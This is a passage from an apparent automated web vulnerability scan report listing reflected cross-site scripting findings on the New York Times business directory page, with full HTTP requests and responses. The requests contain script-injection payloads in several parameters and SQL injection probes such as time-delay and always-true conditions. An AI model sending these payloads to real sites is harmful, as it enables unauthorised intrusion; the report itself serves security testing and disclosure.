J=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91595
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBSSQAT=EENKJLNDJANMHCOMOFDLADAI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="text" name="KeyWord" id="searchBox-keyword" value="dd82d"><script>alert(1)</script>61c8bf1a9b1c6a1bf" onFocus="if(this.value=='-- Keyword --') this.value='';" onBlur="if(this.value=='') this.value='-- Keyword --';">
...[SNIP]...

4.199. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a81"><script>alert(1)</script>038231c4115 was submitted in the KeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--62a81"><script>alert(1)</script>038231c4115&RegionId=&SubCatId= HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 41043
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCRTTDT=PIDHDNGAPGFGGILLIALHCCJD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="text" name="KeyWord" id="searchBox-keyword" value="-- Keyword --62a81"><script>alert(1)</script>038231c4115" onFocus="if(this.value=='-- Keyword --') this.value='';" onBlur="if(this.value=='') this.value='-- Keyword --';">
...[SNIP]...

4.200. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [LIndex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the LIndex request parameter is copied into the HTML document as plain text between tags. The payload 4a110<script>alert(1)</script>e20f3c033f920b42f was submitted in the LIndex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=34a110<script>alert(1)</script>e20f3c033f920b42f&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:39:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=34a110<script>alert(1)</script>e20f3c033f920b42f&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsp
...[SNIP]...

4.201. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [LIndex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the LIndex request parameter is copied into the HTML document as plain text between tags. The payload 756d2<script>alert(1)</script>a60ed238bb3 was submitted in the LIndex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3756d2<script>alert(1)</script>a60ed238bb3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=nets
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3756d2<script>alert(1)</script>a60ed238bb3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsp
...[SNIP]...

4.202. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [LOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the LOrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a5f"><script>alert(1)</script>3f3d1fee52d854ab4 was submitted in the LOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=Ac1a5f"><script>alert(1)</script>3f3d1fee52d854ab4&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91545
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=BHLKNADAHFDLCDMBBPMEAHIP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="LOrder" value="Ac1a5f"><script>alert(1)</script>3f3d1fee52d854ab4">
...[SNIP]...

4.203. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [LOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the LOrder request parameter is copied into the HTML document as plain text between tags. The payload 4230d<script>alert(1)</script>94f5f0eaea9 was submitted in the LOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A4230d<script>alert(1)</script>94f5f0eaea9&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N101
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A4230d<script>alert(1)</script>94f5f0eaea9&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010
...[SNIP]...

4.204. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [LastPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the LastPage request parameter is copied into the HTML document as plain text between tags. The payload 5c655<script>alert(1)</script>a80cc6d6a03 was submitted in the LastPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=405c655<script>alert(1)</script>a80cc6d6a03&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=405c655<script>alert(1)</script>a80cc6d6a03&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2
...[SNIP]...

4.205. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [LastPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the LastPage request parameter is copied into the HTML document as plain text between tags. The payload d1930<script>alert(1)</script>4940575c8d1c8304a was submitted in the LastPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

